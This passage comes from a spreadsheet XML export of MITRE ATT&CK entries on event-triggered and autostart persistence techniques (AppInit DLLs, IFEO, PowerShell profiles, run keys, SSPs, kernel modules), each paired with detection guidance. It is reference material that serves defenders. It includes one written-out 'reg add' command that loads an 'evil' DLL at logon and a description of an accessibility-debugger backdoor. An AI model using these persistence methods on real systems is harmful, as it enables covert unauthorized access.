    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppCertDLLs&lt;/code&gt; Registry key under &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;, or &lt;code&gt;WinExec&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/009</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) 
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)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</si>
  <si>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Event Triggered Execution: AppInit DLLs</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppInit_DLLs&lt;/code&gt; value in the Registry keys &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; or &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)
Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. 
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/010</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values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
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) 
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.</t>
  </si>
  <si>
    <t>Secure boot disabled on systems running Windows 8 and later</t>
  </si>
  <si>
    <t>Event Triggered Execution: Application Shimming</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)
Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. 
A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/011</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</si>
  <si>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</si>
  <si>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Event Triggered Execution: Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., &lt;code&gt;C:\dbg\ntsd.exe -g  notepad.exe&lt;/code&gt;). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as &lt;code&gt;Debugger&lt;/code&gt; values in the Registry under &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; where &lt;code&gt;&amp;lt;executable&amp;gt;&lt;/code&gt; is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/012</t>
  </si>
  <si>
    <t>Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe</t>
  </si>
  <si>
    <t>Event Triggered Execution: PowerShell Profile</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (&lt;code&gt;profile.ps1&lt;/code&gt;) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) 
Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the &lt;code&gt;-NoProfile&lt;/code&gt; flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) 
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations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</si>
  <si>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Allen DeRyke, ICE</t>
  </si>
  <si>
    <t>Event Triggered Execution: Emond</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at &lt;code&gt;/sbin/emond&lt;/code&gt; will load any rules from the &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/014</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Ivan Sinyakov</t>
  </si>
  <si>
    <t>Event Triggered Execution: Component Object Model Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/015</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</si>
  <si>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</si>
  <si>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Elastic</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</si>
  <si>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logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)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
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547</t>
  </si>
  <si>
    <t>Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns)  Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. 
Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To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
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.
Monitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.</t>
  </si>
  <si>
    <t>Administrator, User, root</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is &lt;code&gt;C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;/code&gt;. The startup folder path for all users is &lt;code&gt;C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp&lt;/code&gt;.
The following run keys are created by default on Windows systems:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&lt;/code&gt; is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
The following Registry keys can control automatic startup of services during boot:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; subkeys can automatically launch programs.
Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run when any user logs on.
By default, the multistring &lt;code&gt;BootExecute&lt;/code&gt; value of the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; is set to &lt;code&gt;autocheck autochk *&lt;/code&gt;. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations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</si>
  <si>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https://attack.mitre.org/techniques/T1547/001</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</si>
  <si>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</si>
  <si>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Boot or Logon Autostart Execution: Authentication Package</t>
  </si>
  <si>
    <t>Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&amp;lt;target binary&amp;gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/002</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Time Providers</t>
  </si>
  <si>
    <t>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\&lt;/code&gt;. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/003</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt; as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Scott Lundgren, @5twenty9, Carbon Black</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in &lt;code&gt;HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) 
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/004</t>
  </si>
  <si>
    <t>21 April 2020</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</si>
  <si>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</si>
  <si>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Boot or Logon Autostart Execution: Security Support Provider</t>
  </si>
  <si>
    <t>Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/005</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) 
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/006</t>
  </si>
  <si>
    <t xml:space="preserve">Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: &lt;code&gt;modprobe&lt;/code&gt;, &lt;code&gt;insmod&lt;/code&gt;, &lt;code&gt;lsmod&lt;/code&gt;, &lt;code&gt;rmmod&lt;/code&gt;, or &lt;code&gt;modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt; On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;
On macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the &lt;code&gt;kext_policy&lt;/code&gt; table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, &lt;code&gt;/var/db/SystemPolicyConfiguration/KextPolicy&lt;/code&gt;.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
</t>
  </si>
  <si>
    <t>Anastasios Pingios; Jeremy Galloway; Red Canary; Wayne Silva, F-Secure Countercept</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Re-opened Applications</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at &lt;code&gt;~/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; and &lt;code&gt;~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist&lt;/code&gt;. 
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/007</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: LSASS Driver</t>
  </si>
  <si>
    <t>Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/008</t>
  </si>
  <si>
    <t xml:space="preserve">With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)
Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. </t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Shortcut Modification</t>
  </si>
  <si>
    <t>Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/009</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</si>
  <si>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</si>
  <si>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Bobby, Filar, Elastic; David French, Elastic; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Port Monitors</t>
  </si>
  <si>
